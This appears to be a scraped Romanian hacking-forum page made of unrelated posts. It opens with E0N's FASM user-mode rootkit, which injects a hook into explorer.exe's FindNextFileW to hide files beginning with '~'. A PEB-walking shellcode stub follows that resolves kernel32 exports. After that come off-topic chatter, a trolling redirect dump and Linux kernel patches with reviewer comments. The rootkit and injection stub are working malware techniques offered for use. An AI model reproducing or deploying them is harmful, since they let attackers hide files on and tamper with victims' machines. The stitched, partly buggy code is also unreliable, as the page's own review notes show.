Author: EON - Hi, this code hook the FindNextFileW api to hide all the files that begin with "~". Change the pid for the pid of explorer.exe to saw the effect.
; *******************************************************
; *** Example of a little rootkit that hide all the   ***
; *** files that begin with "~" without use Dll.      ***
; ***                                                 ***
; *** By E0N (L) 2008                                 ***
; *******************************************************
;
; How it works (as the code below shows):
;   1. a trampoline (first x bytes of FindNextFileW, then push DirApi+x / ret)
;      is built locally and copied into the target process;
;   2. a one-dword struct holding the remote trampoline address is copied into
;      the target, and its address is patched into the imm32 of the
;      `mov ebx, 0x0000` inside MyFindNextFileW (the 4 bytes before CAMBIO);
;   3. MyFindNextFileW is copied into the target and the first 5 bytes of
;      FindNextFileW are overwritten with a relative jmp to it.
; NOTE(review): the scheme assumes kernel32.dll is mapped at the same base in
; this process and in the target (presumably true on the pre-ASLR Windows it
; was written for, not guaranteed later) and that the first x=7 bytes of the
; target's FindNextFileW are whole, position-independent instructions. Neither
; assumption is checked, and no API return value below is checked either.

include 'H:\archivos de programa\fasm\include\win32ax.inc'   ; hard-coded local path; adjust before assembling

.data
HookApi       db 'FindNextFileW' , 0    ; Name of the api to hook
HookDll       db 'Kernel32.dll' , 0     ; Name of the DLL that contains it
DirApi        dd ?                      ; Address of the api to hook (resolved in this process)
process       dd ?                      ; Handle returned by OpenProcess
pid           dd 2160                   ; PID of the process to hook (hard-coded; edit before assembling)
x             dd 7                      ; Number of bytes copied from the start of the api into the trampoline
BufferCall    dd ?                      ; Local buffer holding the trampoline that calls the original api
inyBufferCall dd ?                      ; Address of that trampoline once injected into the target
tamFun        dd ?                      ; Size of the function that replaces the api
inyFun        dd ?                      ; Address of that function once injected
BufferApi     dd ?                      ; 5-byte buffer (jmp rel32) that replaces the start of the api

struct Datos
  sBufferCall dd ?                      ; Pointer to inyBufferCall, so the hook can call the original api
ends
dat         Datos ?
SizeofDatos dd 4
dirStruct   dd ?                        ; Address of the structure once injected
Prote       dd ?                        ; Receives the old protection from VirtualProtect

.code
start:
        ; Get a handle to the process we will inject into.
        ; NOTE(review): the handle is not checked; a NULL handle (wrong pid,
        ; insufficient rights) makes every later remote call fail silently.
        mov     eax, PROCESS_VM_OPERATION
        or      eax, PROCESS_VM_WRITE
        invoke  OpenProcess, eax, FALSE, [pid]
        mov     [process], eax

        ; Get the address of the api to hook (resolved here, reused as-is in
        ; the target: relies on an identical kernel32 base in both processes)
        invoke  GetModuleHandle, HookDll
        invoke  GetProcAddress, eax, HookApi
        mov     [DirApi], eax

        ; Build the trampoline that calls the original api:
        ;   x bytes               | 1 byte      | 4 bytes    | 1 byte
        ;   x first bytes of api  | push [0x68] | DirApi + x | ret [0xC3]
        mov     eax, dword [x]
        add     eax, 6
        invoke  LocalAlloc, LPTR, eax                           ; eax = x + 6
        mov     [BufferCall], eax
        invoke  RtlMoveMemory, [BufferCall], [DirApi], [x]      ; copy the first x bytes of the api
        mov     eax, [BufferCall]
        add     eax, [x]
        mov     byte [eax], 0x68
        inc     eax
        mov     ebx, [DirApi]
        add     ebx, [x]
        mov     dword [eax], ebx
        add     eax, 4
        mov     byte [eax], 0xC3

        ; Inject the trampoline
        ; NOTE(review): allocated PAGE_READWRITE but executed in the target
        ; (call dword [ebx] below) -- presumably only works where DEP/NX is
        ; not enforced for that process.
        mov     eax, MEM_RESERVE                ; eax = MEM_RESERVE | MEM_COMMIT
        or      eax, MEM_COMMIT
        mov     ecx, [x]                        ; ecx = x + 6
        add     ecx, 6
        invoke  VirtualAllocEx, [process], 0, ecx, eax, PAGE_READWRITE
        mov     [inyBufferCall], eax
        mov     ebx, [x]                        ; ebx = x + 6
        add     ebx, 6
        invoke  WriteProcessMemory, [process], [inyBufferCall], [BufferCall], ebx, NULL

        ; Initialize the structure
        mov     eax, [inyBufferCall]            ; store the pointer to the trampoline so the
        mov     [dat.sBufferCall], eax          ; hook can call the api normally

        ; Inject the structure
        mov     eax, MEM_RESERVE
        or      eax, MEM_COMMIT
        invoke  VirtualAllocEx, [process], 0, [SizeofDatos], eax, PAGE_READWRITE
        mov     [dirStruct], eax
        invoke  WriteProcessMemory, [process], [dirStruct], dat, [SizeofDatos], NULL

        ; Replace the 0x0000 immediate with a pointer to the structure
        mov     ebx, CAMBIO                     ; ebx = the 0x0000 that must be changed (4 bytes before CAMBIO)
        sub     ebx, 4
        invoke  VirtualProtect, ebx, 6, PAGE_EXECUTE_READWRITE, Prote
        invoke  RtlMoveMemory, ebx, dirStruct, 4

        ; Calculate the size of the function to inject
        mov     eax, FIN_MyFindNextFileW
        sub     eax, MyFindNextFileW
        mov     [tamFun], eax

        ; Inject the function
        mov     eax, MEM_RESERVE                ; eax = MEM_RESERVE | MEM_COMMIT
        or      eax, MEM_COMMIT
        invoke  VirtualAllocEx, [process], 0, [tamFun], eax, PAGE_EXECUTE_READWRITE
        mov     [inyFun], eax
        invoke  WriteProcessMemory, [process], [inyFun], MyFindNextFileW, [tamFun], NULL

        ; Build the buffer that hooks the api:
        ;   1 byte     | 4 bytes
        ;   jmp [0xE9] | displacement
        invoke  LocalAlloc, LPTR, 5
        mov     [BufferApi], eax
        mov     byte [eax], 0xE9
        inc     eax
        mov     ebx, [inyFun]
        sub     ebx, [DirApi]
        sub     ebx, 5                          ; 5 = -1 for the 0xE9 opcode and -4 for the displacement
        mov     dword [eax], ebx

        ; Write this buffer over the start of the api
        ; NOTE(review): VirtualAllocEx on an address that is already mapped
        ; (kernel32's code page) is not expected to succeed; VirtualProtectEx
        ; is the call that makes an existing page writable. The result is not
        ; checked, so whether the write below lands depends on how
        ; WriteProcessMemory itself handles the page protection. The 5-byte
        ; overwrite is also not atomic with respect to other threads in the
        ; target that may be executing FindNextFileW at that moment.
        mov     eax, MEM_RESERVE                ; eax = MEM_RESERVE | MEM_COMMIT
        or      eax, MEM_COMMIT
        invoke  VirtualAllocEx, [process], [DirApi], 5, eax, PAGE_EXECUTE_READWRITE
        invoke  WriteProcessMemory, [process], [DirApi], [BufferApi], 5, NULL
        invoke  ExitProcess, 0

; Function that replaces the api.
; It is copied byte-for-byte into the target, so it may only use ebp-relative
; arguments, relative jumps and the absolute pointer patched in at CAMBIO.
; Returns 1 for the next entry that passes the filter, 0 when the original api
; returns 0.
; NOTE(review): ebx is callee-saved in the Win32 stdcall convention and this
; proc declares no `uses ebx`, so callers of FindNextFileW that keep state in
; ebx get it clobbered.
proc MyFindNextFileW hFindFile, lpFindFileData
  OK:
        mov     ebx, 0x0000                     ; this 0x0000 becomes a pointer to the structure before injection
  CAMBIO:
        push    [lpFindFileData]
        push    [hFindFile]
        call    dword [ebx]                     ; original api, via the trampoline
        mov     ebx, eax
        cmp     ebx, 0
        je      RETORNAR_FIN
        mov     eax, [lpFindFileData]
        ; add eax, 44
        ; NOTE(review): with `add eax, 44` commented out, the byte compared
        ; below is offset 0 of the WIN32_FIND_DATAW buffer, which (judging from
        ; the disabled offset) is not where the author meant to read cFileName;
        ; as posted, the '~' test is not applied to the file name. Confirm
        ; against the structure layout before relying on this listing.
        cmp     byte [eax], '~'
        je      OK                              ; skip this entry and fetch the next one
        mov     eax, 1
        ret
  RETORNAR_FIN:
        mov     eax, 0
        ret
endp
FIN_MyFindNextFileW:

.end start
In conclusion, is a little-rootkit without dll.
-
Credits : HUTCH pour la fonction StringCompare PHRACK pour le tips pour récuperer K32 Reference : NEITSA pour la méthodo Author: steve10120
; Position-independent stub: locates kernel32.dll through the PEB, walks its
; export table to resolve GetProcAddress and LoadLibraryA by name, then (as a
; test) loads user32.dll and calls MessageBoxA.
; Every data reference is meant to go through [ebp + label] (delta-offset
; addressing) so the code can run wherever it is copied; see .find_function
; for the one place that does not.
        call    .hwndDelta
.hwndDelta:
        pop     ebp
        sub     ebp, .hwndDelta                 ; ebp = delta between assembled and actual address

.find_kernel:
        mov     eax, [fs:30h]                   ; EAX = PEB base
        mov     eax, [eax + 0ch]                ; EAX = PEB_LDR_DATA
        mov     esi, [eax + 1ch]                ; first entry in InInitializationOrderModuleList
        lodsd                                   ; forward to the next LIST_ENTRY
        mov     ebx, [eax + 08h]                ; EBX = kernel32 base address
        ; NOTE(review): taking the second module in InInitializationOrderModuleList
        ; as kernel32 is the XP-era convention; on later Windows versions another
        ; DLL is commonly found in that slot -- verify on the target, or walk the
        ; list and compare module names instead.
        mov     [ebp + _kernelBase], ebx
        mov     esi, dword[ebx + 3Ch]           ; ESI = e_lfanew (offset of the PE header)
        add     esi, [ebp + _kernelBase]
        mov     edx, [esi + 078h]               ; EDX = RVA of the export table
        add     edx, [ebp + _kernelBase]        ; EDX = VA of the export table
        mov     ecx, [edx + 018h]               ; ECX = number of exported names of the DLL
        mov     [ebp + _function_nb], ecx
        mov     ebx, [edx + 020h]               ; EBX = RVA of the name-pointer table
        add     ebx, 4                          ; NOTE(review): entry 0 of the name table is never compared
        add     ebx, [ebp + _kernelBase]        ; EBX = VA of the name-pointer table (+4)
        ; From here on we have everything needed to look up functions

        ; Resolve GetProcAddress
        pushad
        lea     edi, [ebp + _szGetProcAddress]  ; EDI = "GetProcAddress"
        call    .find_function
        mov     [ebp + _getProcAddress], eax
        popad
        ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

        ; Resolve LoadLibraryA
        pushad
        lea     edi, [ebp + _szLoadLibrary]     ; EDI = "LoadLibraryA"
        call    .find_function
        mov     [ebp + _loadLibrary], eax
        popad
        ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

        ; TEST MESSAGEBOX
        ;
        lea     ebx, [ebp + _szUser32]
        push    ebx
        call    [ebp + _loadLibrary]            ; eax = LoadLibraryA("user32.dll")
        ;
        lea     ebx, [ebp + _szMessageBox]
        push    ebx
        push    eax
        lea     edx, [ebp + _getProcAddress]
        call    dword[edx]                      ; eax = GetProcAddress(hUser32, "MessageBoxA")
        ;
        push    0
        lea     esi, [ebp + _szGetProcAddress]
        push    esi                             ; caption
        lea     edi, [ebp + _szGetProcAddress]
        push    edi                             ; text
        push    0
        call    eax                             ; MessageBoxA(0, text, caption, 0)
        ;;;;;;;;;;;;;;;;
        ret

; Look up an export of kernel32 by name.
;   in : EDI = NUL-terminated name to find
;        EBX = current position in the name-pointer table
;        ECX = remaining name count, EDX = export table VA
;   out: EAX = VA of the function
; NOTE(review): the loop has no exit when the name is absent (ECX is
; decremented but never tested), and the address-table index is derived from
; the name index without consulting the ordinal table; that only holds when
; both tables are in the same order.
.find_function:
.find_function_loop:
        mov     esi, dword[ebx]                 ; ESI = RVA of the function name
        add     ebx, 4
        add     esi, [ebp + _kernelBase]        ; ESI = VA of the function name
        dec     ecx                             ; ECX = ECX - 1
        call    .stringCompare
        cmp     eax, -1
        je      .find_function_loop
        mov     ebx, [edx + 01ch]               ; EBX = RVA of the address table
        add     ebx, [ebp + _kernelBase]        ; pointer to the address table
        mov     edx, dword[_function_nb]        ; NOTE(review): absolute address, not [ebp + _function_nb]; breaks when the stub runs anywhere but its assembled address
        sub     edx, ecx                        ; index of the matching entry
        imul    edx, edx, 4
        add     ebx, edx
        mov     eax, ebx
        mov     eax, dword[eax]
        add     eax, [ebp + _kernelBase]        ; EAX = VA of the function
        ret

; Compare the NUL-terminated strings at ESI and EDI.
;   out: EAX = 0 when equal, -1 otherwise; all other registers preserved
.stringCompare:
        pushad
        mov     ecx, esi
        mov     edx, edi
.cmst:
        mov     al, [ecx]
        cmp     al, [edx]
        jne     .no_match
        add     ecx, 1
        add     edx, 1
        test    al, al
        jne     .cmst
        popad
        xor     eax, eax
        ret
.no_match:
        popad
        mov     eax, -1
        ret

_szGetProcAddress db "GetProcAddress",0
_szLoadLibrary    db "LoadLibraryA",0
_kernelBase       dd ?
_function_nb      dd ?
_szMessageBox     db "MessageBoxA",0
_szUser32         db "user32.dll",0
_getProcAddress   dd ?
_loadLibrary      dd ?
-
Nu dai si tu de baut? :->
-
Da, utilizatori (useri) porno.
-
Da, tipic. Windu: O sa vezi multe astfel de comentarii, sugestia mea e sa nu le iei in seama.
-
Voi chiar ati descarcat ce a postat? Dupa ce v-a spus ce contine?
-
Unde a fost? Putea sa participe oricine?
-
Topic de cacat. Au rezultat 8 avertismente care au dus la cateva banuri. Se muta la gunoi.
-
Binary Code Modification [Patching Vulnerabilities] Download: http://www.securityarchitect.org/binary-english.pdf
-
Dragut, toate posturile nu au nici o legatura cu acel program, deci toate au primit warn. Si au rezultat 3 banuri. In caz ca nu ati observat, am revenit
-
Ce anume? Ca te redirectioneaza la un link lung? O amarata de linie de cod. HTTP/1.1 302 Found Connection: close Date: Fri, 22 Oct 2010 19:32:30 GMT Location: You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/Ass Server: Apache/2.2.9 (Debian) PHP/5.2.14-0.dotdeb.0 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0 Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html Client-Date: Fri, 22 Oct 2010 19:32:30 GMT Client-Peer: 81.20.136.200:80 Client-Response-Num: 1 Client-Warning: Redirect loop detected (max_redirect = 7) X-Powered-By: PHP/5.2.14-0.dotdeb.0 Headerele HTTP. 
Un Location...
-
Pe Linux folosesti compilatoarele de la GNU: gcc si g++. Atentie, daca esti obisnuit sa lucrezi cu Borland C o sa fie nevoie de niste schimbari, limbajul nu mai e chiar ca acum 20 de ani pe vremea cand a aparut acel compilator. Pe Windows folosesti CodeBlocks sau DevC++. Compilatorul folosit de ambele este MinGW, portarea pe Windows a compilatoarelor GNU. Citeste cu atentie mesajele de eroare sau avertismentele si cauta-le pe Google daca nu intelegi ce vor sa spuna.
-
Din fericire noi nu avem de ce sa ne facem griji, daca e trenul la 200 de metri poti bea linistit doua beri pana ajunge.
-
Maine plec la Bucuresti, deci cateva zile nu o sa pot face mare lucru. Mie imi spuneti asa: "Vreau un program care sa faca asta (sa posteze commenturi pe wordpress de exemplu)" si o sa fac ce pot. Dar nu stiu cat timp nu voi avea net acolo.
-
Da, toata lumea vrea chiar daca nu o sa il foloseasca, mentalitatea asta... Sunt curios cati le vor folosi, si cati vor face chiar si seed.
-
[PATCH] /fs/qnx4/namei.c (2.6.35.6): Uninitialized variable warning
--- a/fs/qnx4/namei.c 2010-09-27 03:19:16.000000000 +0300
+++ b/fs/qnx4/namei.c 2010-09-27 22:40:39.249566930 +0300
@@ -101,7 +101,7 @@ static struct buffer_head *qnx4_find_ent
 struct dentry * qnx4_lookup(struct inode *dir, struct dentry *dentry, struct nameidata *nd)
 {
- int ino;
+ int ino = 0;
  struct qnx4_inode_entry *de;
  struct qnx4_link_info *lnk;
  struct buffer_head *bh;
Warning: fs/qnx4/namei.c: In function ‘qnx4_lookup’: fs/qnx4/namei.c:104: warning: ‘ino’ may be used uninitialized in this function
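Review bot: `int ino = 0;` silences the warning without establishing whether any path really reaches the read of `ino` unassigned, and the commit message only quotes gcc. If such a path exists, the patch turns an uninitialized read into a silent lookup of inode 0, which is harder to notice than the warning; if it does not (for instance because `ino` is only written through a pointer handed to a helper, a common cause of this gcc diagnostic), the initializer is dead code that kernel maintainers of that era preferred to see as `uninitialized_var(ino)` or left alone. The body of qnx4_lookup, including the use of `ino`, lies outside the hunk, so which case applies cannot be confirmed here; the commit message should state it.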
-
[PATCH] /fs/omfs/file.c (2.6.35.6): Simple variable initialization
--- a/fs/omfs/file.c 2010-09-27 03:19:16.000000000 +0300
+++ b/fs/omfs/file.c 2010-09-27 22:36:44.800566930 +0300
@@ -222,7 +222,7 @@ static int omfs_get_block(struct inode *
  struct buffer_head *bh;
  sector_t next, offset;
  int ret;
- u64 new_block;
+ u64 new_block = 0;
  u32 max_extents;
  int extent_count;
  struct omfs_extent *oe;
Warning: fs/omfs/file.c: In function ‘omfs_get_block’: fs/omfs/file.c:225: warning: ‘new_block’ may be used uninitialized in this function
</gr_warning>
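Review bot: Defaulting `new_block` to 0 is a questionable way to quiet this warning, because 0 is a plausible block number: if the compiler is right and some path reads `new_block` before it is assigned, the patched code maps the buffer to block 0 instead of tripping a sanitizer or a visible garbage value. If the compiler is wrong, the initializer is a no-op that the commit message ("Simple variable initialization") does not justify beyond the warning text. The reads and writes of `new_block` are outside the hunk, so the patch should say which case holds, and ideally fix the control flow that confuses gcc rather than mask it.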
-
[PATCH] /fs/ocfs2/slot_map.c (2.6.35.6): Uninitialized variable
--- a/fs/ocfs2/slot_map.c 2010-09-27 22:27:07.605568537 +0300
+++ b/fs/ocfs2/slot_map.c 2010-09-27 22:27:29.342567489 +0300
@@ -357,7 +357,7 @@ static int ocfs2_map_slot_buffers(struct
 {
  int status = 0;
  u64 blkno;
- unsigned long long blocks, bytes;
+ unsigned long long blocks, bytes = 0;
  unsigned int i;
  struct buffer_head *bh;
Warning: fs/ocfs2/slot_map.c: In function ‘ocfs2_init_slot_info’: fs/ocfs2/slot_map.c:360: warning: ‘bytes’ may be used uninitialized in this function fs/ocfs2/slot_map.c:360: note: ‘bytes’ was declared here
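Review bot: Initializing only the second of two variables declared on one line, `unsigned long long blocks, bytes = 0;`, is easy to misread as initializing both; split the declaration into `unsigned long long blocks;` and `unsigned long long bytes = 0;`. The warning is reported in ocfs2_init_slot_info although the hunk sits in ocfs2_map_slot_buffers, which suggests the latter was inlined and gcc lost track of the assignment to `bytes`; if so the initializer is masking a false positive and the commit message should say that rather than just quoting the warning. The uses of `bytes` are outside the hunk, so this cannot be confirmed here.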
-
Am si eu o carte scrisa de el, dar nu am apucat sa o citesc.